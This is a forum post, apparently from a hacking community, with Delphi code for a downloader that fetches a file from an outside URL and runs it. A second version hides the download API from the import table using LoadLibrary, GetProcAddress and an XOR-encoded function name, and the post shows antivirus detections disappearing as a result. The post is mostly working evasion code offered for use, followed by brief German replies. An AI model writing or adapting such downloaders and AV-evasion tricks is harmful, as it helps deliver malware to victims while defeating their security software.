[B] Bypassing the heuristic scan

[-=Player=-]

The antivirus heuristic scan bypasser. Nowadays, the majority of the AV softwares uses intergrated heuristic function to detect suspecious code and APIs that are commonly used by viruses, trojans and other malwares. Their goal is to detect viruses without manually adding signature offset for each virus. They will be able to detect viruses before they are released publicly. In this article I will try to show you how to bypass the heuristic scan.

How can we do that?
I will use an example by Lord, we?ll make a simple web downloader which use the widely used API ?urldownloadtofile?. This API is detected in the heuristic scanner as suspecious code.

Delphi code:

Code:

program Project2;

{$APPTYPE CONSOLE}

uses
URLMon,windows,
ShellApi,
SysUtils;

begin
UrlDownloadToFile(nil, PChar('http://fahde.free.fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,nil,SW_SHOW);

end.

After you have compiled this source, try scanning it with Antivirus. A report from Virustotal will gives these results :

Ikarus: Trojan-Downloader.Win32.Banload.BQ
Bit defender: BehavesLike:Trojan.Downloader
NOD32: NewHeur_PE probably unknown virus

Well this doesn?t seem very good for us? Now a newbeginner would ask himself, how in the world could they detect my own privately coded webdownloader?? I didn?t even release it on the internet.

The heuristic scanners does not count the URLDOWNLOADTOFILE api alone as a threat, but combined with ShellExecute. I will explain when our application wants to call the UrlDownloadtoFile function, it does not call it directly from the .DLL file that contains the function (urlmon.dll), it instead calls it from the memory. But an exefile/dllfile do not know for example where Shellexecute API is located in the memory, therefore it uses IAT "Importation Address Table". The IAT knows where the API is located in memory, so our application gets access to the API through IAT.

Now as we know how the heuristic works, it?s time to bypass it. All APIs which our application uses is listed in the IAT, the antiviruses scan the IAT and if our API is there they?ll detect it.
So to make our API not appear in the IAT we will use two other APIs which the antivirus software does not suspect. LoadLibrary and GetProcAdress, these two APIs with help from ptite routine of encoding, will dynamically load urlmon.dll which contains the function UrlDownloadToFile. Now we don?t need to ask IAT for the location of our APIs because we are loading them independatally.

Time To Re-Code :

Code:

program Project2;

{$APPTYPE CONSOLE}
// By BuGGz : www.instinct-coders.tz4.com 
uses
windows,messages,dialogs,
ShellApi,
SysUtils;

type
//we declare the function with the correct paramters so we can manipulate it later.
TMyProc = function(Caller: IUnknown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;
 // the function for decrypting.
function Decrypt(Str : String; Key: string): String;
var
  Y, Z : Integer;
  B : Byte;
begin
  Z := 1;
  for Y := 1 to Length(Str) do
  begin
    B := (ord(Str[Y]) and $0f) xor (ord(Key[Z]) and $0f);
     B := b xor 10 ;
    Str[Y] := char((ord(Str[Y]) and $f0) + B);
    Inc(Z);
    If Z > length(Key) then Z := 1;
  end;
  Result := Str;
end;



var
Handle: THandle;
Maproc: TMyProc;
crypte,decrypte : string;
begin
Decrypte := Decrypt(']ZDLgfdgil\gNadmI' ,'2'); 
showmessage(Decrypte);  //to make sure that the final result is good
 Handle := loadlibrary('Urlmon.dll'); // load the dll

if Handle <> 0 then

begin

try

//Decrypt then load the function dynamically from the DLL
@Maproc := GetProcAddress(Handle, pchar(Decrypt(']ZDLgfdgil\gNadmI' ,'2')));

if @Maproc<> nil then

begin
Maproc(nil,'http://fahde.free.fr/bug/rel/ICrypt%201.0.rar','C:\ICrypt.rar',0, nil); // this is the download function which is renamed to Maproc to avoid detection
ShellExecute(Handle,'open',PChar('C:\ICrypt.rar'),nil,nil,SW_SHOW); 
end;

Finally

FreeLibrary(Handle); // free the dll file after we?ve used it.

end;
end

end.

Scan after compile:

Ikarus: No virus found in memory
Bit defender: No virus found in memory
NOD32 : No virus found in memory

Sans Rancune AVs .

Credits :
All the credits goes to Lord since I just translated his code into Delphi.
BuGGz , www.instinct-coders.tz4.com

[CreativeFrags]

nochma in deutsch will xD
och mann nun muss ich solang lesen...

*durchles und danach evtl edit mach*

trozdem schonma thx.. klingt usefull

[nemo]

~

[gORDon_vdLg]

Für die die es auf deutsch haben wollen: Dlls zur laufzeit einbinden
http://www.delphi-treff.de/tutorials...l/dlls/page/7/